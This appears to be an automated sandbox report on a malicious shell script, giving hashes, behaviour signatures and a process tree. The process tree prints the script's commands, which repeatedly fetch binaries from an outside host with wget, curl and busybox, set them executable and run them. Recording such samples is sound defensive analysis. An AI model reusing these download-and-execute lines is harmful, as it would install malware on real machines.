Analysis
-
max time kernel
94s -
max time network
97s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
-
Size
10KB
-
MD5
69e3df199d5f354bf5297b390b090569
-
SHA1
4288b90a27f9f783a5683ef8d6d13b494680b611
-
SHA256
d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7
-
SHA512
6d2e7020f72b1720ffe5fdf30d927c87ac5b9bcbb327d4b52ce629f45ec7de5c180a03773bc3e840b9a3bbb4fae5e03edef53016476059ac8c6c60eeb54523cd
-
SSDEEP
192:AOyeXwg9lHemldOY48OkgSemldOY53yeXwgfN:AOlemlcY48OkgSemlcYFN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 742 chmod 960 chmod 967 chmod 995 chmod 777 chmod 869 chmod 890 chmod 862 chmod 883 chmod 918 chmod 1002 chmod 946 chmod 911 chmod 925 chmod 932 chmod 939 chmod 981 chmod 808 chmod 842 chmod 876 chmod 904 chmod 749 chmod 974 chmod 1009 chmod 815 chmod 897 chmod 953 chmod 988 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 743 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 750 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 779 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 809 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 816 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 843 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 863 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 870 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 877 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 884 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 891 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey 898 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O 905 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 912 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 919 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 926 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 933 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 940 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 947 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 954 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 961 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 968 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O 975 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 982 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey 989 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 996 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 1003 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 1010 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 945 busybox 970 wget 971 curl 987 busybox 761 curl 887 curl 914 wget 942 wget 1006 curl 1008 busybox 783 wget 861 busybox 931 busybox 812 curl 859 curl 901 curl 872 wget 875 busybox 943 curl 999 curl 769 busybox 811 wget 818 wget 880 curl 893 wget 924 busybox 977 wget 994 busybox 737 curl 879 wget 910 busybox 966 busybox 973 busybox 978 curl 791 curl 848 wget 882 busybox 956 wget 964 curl 980 busybox 984 wget 998 wget 716 wget 745 wget 752 wget 894 curl 907 wget 922 curl 1001 busybox 748 busybox 807 busybox 873 curl 952 busybox 959 busybox 992 curl 814 busybox 834 busybox 889 busybox 1005 wget 741 busybox 823 curl 886 wget 903 busybox 928 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 curl File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O curl File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 curl File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl
Processes
-
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:714
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- System Network Configuration Discovery
PID:769
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:782
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:807
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:868
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:896
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:917
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:938
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:947
-
-
